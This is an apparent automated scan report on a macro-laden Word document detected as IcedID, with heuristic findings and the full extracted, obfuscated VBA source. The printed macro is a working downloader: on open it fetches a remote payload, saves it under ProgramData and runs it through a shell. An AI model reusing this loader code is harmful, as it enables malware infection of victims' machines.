Verdict: MALICIOUS
Risk score: 290
Heuristics: 7
- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings): Document contains a VBA project; VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script:
  Set MlYgu = CreateObject(EEGCu + "." + "shell")
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  Set XRoug = VBA.CreateObject(eYuXT + "" + FMgzn)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script:
  Sub AutoOpen()
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas: in document text (OOXML body / shared strings)
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14048 bytes | 6ad700f72ff3b81a819cd85466b917117e67853f32c793316db2e2a81a0d6956 |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lcISL"
Sub VsyHu(IPqdF, Optional ByVal XlmYx As String = "c:\programdata\EZvtA.txt", Optional ByVal FMgzn As String = "systemobject")
' Perceive slices
' Gainful exhales beseeches
' Abbreviation liquidising overtaker incompetence
' Unitary dialect spinners bunker
' Rescaling thrusters reps
' Provable postdated
' Niggled cornices
' Blameworthy leagues unmelodious thoughtful prunes
' Invites impeached graphology filament
' Equivocations subgroups wriggle
' Throughout harms evaluative ameliorating
' Heterosexuals strongest maydays
' Pliable capstan fornicates oaken epicycles
' Despond seabirds troops
' Forecasters vestments provably combusted batting positivity
' Hibernating apogee lipservice
' Meats unhealthy hammerhead housewives
' Ridges seismology vicar scrutinises closet
' Dispatchers
' Spreeing abut hobble perks
' Poses
' Chicken serenading waterresistant
' Tech yielding
' Serviette
' Cohabiting cryptanalytic
' Resistances hoarders grinning handbooks minding aggravate
Set XRoug = VBA.CreateObject(eYuXT + "" + FMgzn)
' Cryptogram ukraine opener granted
' Pergola stairhead
' Prankster trespass lasted assets taxes
' Scape vermilion precautionary coincident
Set AxYPm = XRoug.CreateTextFile(XlmYx)
' Typhus shelled dimple
' Coprocessors certifying shibboleth unmuzzled nerd
' Celebrant
' Overhear
AxYPm.WriteLine IPqdF
' Charitable transliterated extrapolate huntergatherers pomelo unconscious
' Siege
' Raved dollies blowpipe
' Photographer slanderer librarian probabilist
' Unallocated daylights privatise barbers redistribution flasks civility
' Losses exhalations
AxYPm.Close
' Tenable aeration
' Ruminatively dead spotlit
' Reversibly propylene hideout azaleas
' Bazooka blind stale bandwagon irrelevantly
' Lank rafting escalating hooters
' Microcosmic hawaii
' Mown
' Unbearably brainstorming abundance utilised rebirth
' Constrictor
' Diatoms actinides fanning fascinates
' Alertness exacerbating woodpile boosters synonymous
' Dolt walkover
' Dampest mainspring
' Wither spicy
' Sizes flying incriminates governorships appalled
' Gradually taxpayer groves wend deliverer
' Extricated tried recoverable generated
' Anti signposting sand
' Unedited teas timepiece inauspicious
' Annihilates foolproof ventriloquist hulks maladjustment
' Merriest spiny banshees rainclouds enterprise adulterations
' Dowdiest jacuzzi
' Avantgarde submerging meshing
' Purport packed pompeii shortages
' Exceptionable accidents same
' Delaying chaffed
' Centring say whispered
' Dicing suppression bomb
' Crowded litotes clockmaker marl spittle
' Acidity instantiation counterpoise
' Cavitation fuelled brandish fortified
' Myocardial beneath stalking
' Biliary pealing lousy grievously
' Crow goodish glucose shamed disgustedly
' Amalgamation subjection declarer
' Solecisms applying
' Loving wand bounced
' Loaf
' Astonishing overpopulous metronome generalship
' Learnable ohms
' Keen
' Amniotic bogeys aircraft scaly encyclopedic
' Enchant renegade peasant interlocked allusive faust deaconesses
End Sub
' Flotsam hymnbook separating turnkey
' Revolt chihuahua swindling forswearing glassware
' Byelaw moth swabbed possessing bendings nightcap veracity
' Knee
' Hillwalking outline ascetic
Sub AutoOpen()
' Rooftop purser
' Reclaimer sensationalist portends corset wilting definitiveness magisterial
' Humour barium poetic adit
' Carousing combative underpopulation scooters
' Gallantry micrographs refreshes
' Stomped bonus situationist obeys catered
' Arbitrator darkly chuffed complicates roughed
' Fluency trews
' Mitigating dessicated solicitation turtles outset
' Driers
' Chimes enactments argue douse
' Onagers ambivalently
' Sibyl sententious
' Chloroform measuring
' Ranchers charitable fingernails pillages junta
' Prohibited proofs catnip seductions conservatoire
' Demeanour uninsurable sect bill
' Credible cystine
' Reporter prissy bustling reinstalled
' Priming antagonists deception wantonly inheritors
' Creaming retailer
' Antagonised
' Landslips statistical maniacs specialisations
' Communication bearers uncongenial spawning
' Icepick wrought twelfth
' Lauds overstrung fiddlings castigating
' Pyramids charioteers luanda adaptivity
' Overacted polynomially expelled
' Wastepaper lioness grave
' Functions exile commended
Dim AmYOJ As New gUwvT
' Bivalves sporadically lessons electrolyte infelicitously
' Tortoises showroom rhetoricians
' Sits
' Counts guano clinched
' Redshift razor treasured
gUCPo = ""
' Whatsoever thieves spewing
' Overrode machismo abduction unordered onus
' Soundless donations collaboratively
' Healer lifestyles testimonies controllers
' Deserts rimless fond
' Schizophrenia tsunami pastes cribbing thither
' Street
' Engrave deeply trackers mimicker methylated
' Encrust unevenly
' Hiatus
IPqdF = AmYOJ.alWvs(DHAdD)
' Hero dinosaurs
' Skirts vicious indexer
' Bootlaces citizen verifiable shimmer nasturtium bulkhead barbecues
' Mellows perennials gatecrash smallholders
' Miscreant qualified squeakiest
VsyHu WSYSj(IPqdF)
' Fetter gunfight hexagon choral
' Corncrake printed wormhole
' Bride redeem possess dismantling they
' Deniable sit portrayal
' Accelerator coffer grisly buckets punctuational
' Confronting soundest
' Subject
' Tangled workhorse
' Standardise franked
' Unburned oklahoma breaches
' Glowered expedites
' Volunteer swore vacate ultraviolet hobnailed
WTZvL ayZJP(0) + "vr32 c:\programdata\EZvtA.txt", "wscript"
End Sub
Function Xxlue(devcp, VXtOw)
' Domed indent
' Enthralled impaler punctually papua reporter
' Pitching inhuman combining reaffirmation
' Hotair altercations acids inbuilt
' Uncleanly biasses
Xxlue = Split(devcp, VXtOw)
End Function
Attribute VB_Name = "rwHET"
' Warmblooded strides
' Unawakened royal
' Explored vaster
' Glutton
' Isomers sickens
' Hangars trackless
Function WSYSj(PHdCG)
' Desertion lambswool conciliating misanthropists
' Reformer paternal
' Aviator world
' Ducted emit
' Typologically highs
' Authenticated synthesis commentary resending martians bounce
' Clocking bound satchels
' Niggardly wellorganised prettify irascibility
WSYSj = StrConv(PHdCG, vbUnicode)
' Abetting
' Sealants explore wallowed steady
' Impinge anglers
' Comparison tottering enrage slanted sons looks
' Transitive plumpness
' Boxers selective desecrates dendrochronology oat
End Function
' Pressured lockjaw moon unbanned
' Stateoftheart ricochet ores
' Spurns neoplasm
' Pervading father disfigurements
' Considered feints
Function bwBEd()
' Rebound sisterinlaw
' Throwaway enquiry belated breakfasted
' Platoon explicitly yapping landings resprays
' Bind deflate venison petrochemical
' Elbowed joint squirted tone
' Diphthongs
' Matches tremble refresher
' Resembled peacetime wildfowl
' Sapped fishy abler curves
' Lapwing reticence metalinguistic
' Chilblains designated callow sounder
' Astrolabe fomenting presumed denture
' Fertile
With ActiveDocument.shapes(1)
bwBEd = .AlternativeText
End With
End Function
' Maori snipers elegies upthrust dirigible
' Clump juristic woollies
' Book muse stingray
' Emotionless bequeathing oldest mottled decustomised
Function ayZJP(wmAUF)
' Centred idolise loppers
' Outflow genomes language racers corrupting
' Signification articulately icings
' Tinniest snug measurably signatories abattoirs undoing
' Grouper service practising clinched biographers genders
' Intolerable
' Initialisation immigration ruthless involves
' Curtsy smocks flask closedcircuit galaxies
' Strident footprint monuments melt
' Ketchup sitters boons
' Gibbon wisely legislated transgressive
' Previews
enPyR = Xxlue(bwBEd(), "~~~")
tsDJg = enPyR(wmAUF)
ayZJP = tsDJg
End Function
Attribute VB_Name = "gUwvT"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function XDGwo(fHTKY, KdZeB, XTRdR)
' Torches stockier
' Choline home enchantingly
' Strides harassers tectonically
' Overestimate childless
' Mainstays stasis
' Inebriate utilised
XDGwo = Mid(fHTKY, KdZeB, XTRdR)
End Function
Public Function WpYes(ZxoeG, AZyxQ)
' Temperate joblessness malignant typesets substandard
' Swotting sculptor affectionately gawking
' Commissar suffocation hinterlands burgundy
' Disbands anions shoo
' Subconscious strata networked
' Factorisations servile prolong
' Obstructionism parried cooperating steepest
' Recombining neutraliser defensibility radicalism onlooker scathed
' Wins vomits
' Indentations happens sweepingly suppressing ophthalmics foamy
' Rates caravel unrepresentative grim
' Dusted spasmodically airtight
' Bust considerately sergeants grime
' Buckets floury bookworms reduction disbars tubing
' Decanted extremely bacillus methodological
' Infeasibility trucks
' Defer binds
' Humorously hernias rabidly stargazer
sNLPv = Trim(ZxoeG)
For jhsOL = AZyxQ To Len(sNLPv)
bOmSj = XDGwo(sNLPv, jhsOL, AZyxQ) & bOmSj
Next jhsOL
WpYes = bOmSj
End Function
' Subsection biennials craws
' Fevers rattles
' Slavery quibbling
' Egoistic catatonic matters mistrusting reconsulted begetting
' Warmblooded cess
Function alWvs(prRnD)
' Coupling striving
' Boats spatially baker extend
' Ponderously deliverers canton
' Dumped privileges wands
' Strangulation
Dim DFLoP As Object
' Fitter offensives verbatim
' Pews proliferation
' Taperer enemas shifting sibyl
' Rites coercing inhalation blackening attendants devolved dragooned
' Month mockups commentating prophesying
' Scarcely
' Discharge
' Antwerp
' Liner
' Puffin teetotaller
' Comeliness paramilitaries zap ragged telepathic
' Thousandths ritualised viaduct bongs little
' Spume gores legitimate hemispheric
Set DFLoP = CreateObject(WpYes(prRnD, 1) + "." + WpYes(prRnD, 1) + "Request.5.1")
' Standardisation walkout zambian relaying confiscations
' Lacquered halitosis seeker vampire
' Bike hubris sore etymological dentist boaters mocks
' Perming rubric capitalised
' Agreements tercentenary zionist broader
' Gradualism fritter chortling
' Nonparticipation footpaths dislikes fogs premiered
' Sporting landfall
' Decibels unravels lurchers preaching chastises
' Exportable aerobraking mandatory reorganised lichee rusticate
' Walkers unequivocal
' Divider
' Beseeching commonsense
' Reshaped
' Oldfashioned liquors leaderless trilogies
' Paintwork paroxysms ineptness
' Liquids bowdlerisation checkouts aswan deodorant
' Coracle
' Unfair
' Plastics
' Underwriter clinics geologic
' Reverend ripeness seemed hustler besiege
EdOFd = ayZJP(1)
' Maddens undisguised
' Hereupon uncleanliness
' Driveway exonerates genealogical borrow
' Avalanche mineworkers adrift minutiae capered
' Stopover grown respect
' Duellist hot rewritings dumfounds positional
' Calf are labellings earldoms sedate glossy
DFLoP.Open "GET", WpYes(EdOFd, 1), False
' Employable mispronunciations prebend crenellated
' Fixes buttonholes concordat
' Enfranchising underparts fifthly
' Greeds regain concertina
' Strangulation oversize polypeptides warfare
' Patrician basilisk
' Cypress reportage atmospherically strangler
DFLoP.Send
' Checked borrowing bestir dystrophy
' Peaking myocardial prude tuition
' Mythologised amethyst stressfulness
' Asymptomatic fingerless
alWvs = DFLoP.responsebody
End Function
Attribute VB_Name = "FuESu"
Public Const DHAdD As String = "ptthniw"
Public Const eYuXT As String = "scripting.file"
Sub WTZvL(CynKG, EEGCu)
' Sickroom prodigy veers wineskin
' Jewish teheran marshalled
' Ammeter postmodernist redemption
' Garb quieten definer
' Turtle concoction
' Somalia choose yaps listlessness
Set MlYgu = CreateObject(EEGCu + "." + "shell")
' Crofter teddies
' Contaminates
' Groped
' Port underneath rosemary hectic
' Employ camera mahogany programmed fanfares
' Bytes
' Airstrips vestal
' Readers overcommitment
' Grenade solitary classifications
' Clenches pairwise
' Deem lowers happy speech mortification
' Corrugations leanest infants
' Banjo defining partaken parliamentary catchment coquette domain
' Sodomising clog ominous peonies
' Cumbersomely hideaway precomputed prevalently jerseys homeland
' Imposed incised
' Automats tables
' Umbrageous griffin bleeped
' Oestrogens balderdash elastin facile
' Faked brainwashed cellists composition
' Gatepost earplugs indoctrinators
' Impropriety distrust lapwing chalices
' Khaki sophisticates fabulists revisionist whacked dermatological anthropocentric
' Calculator lingual tessellation
' Nevertheless absolutism
' Mallets interferon admonishes
' Fact inelegant internees meteors
' Zonation
' Container burdened shies border festoons
' Weigh pharmaceuticals evangelists secularised frauds downtrodden
' Cleanliness rollercoaster
' Tandems leghorns sturgeons robber mincemeat
' Upland rectal sculls
' Contexts noosed hereafter perplexities aztecs
' Catamarans amateurism tactician
' Glorification
' Madhouse harmed
' Adjudicated barman amputating malicious sweeper baggiest
' Chequebook vilified researches
' Mudflats dismantled hyperbolic
' Crotchetiness woods groundwork
' Removed sponsorship relived flapping
' Mixes farces sulkiest tactful reputes
' Incorruptible reducer moisturisers
Call MlYgu.exec(CynKG)
' Makeup previewer dassies
' Puritans regain orange motivate brushoff mudguard homeward
' Stochastic privately disproofs strata
' Architecture perforations hatchery
End Sub
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 50176 bytes | c84da60f1fecdffd69a1df515d9aa95b2dda38c2c87cf3ab69ff2323f4f7a204 |
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely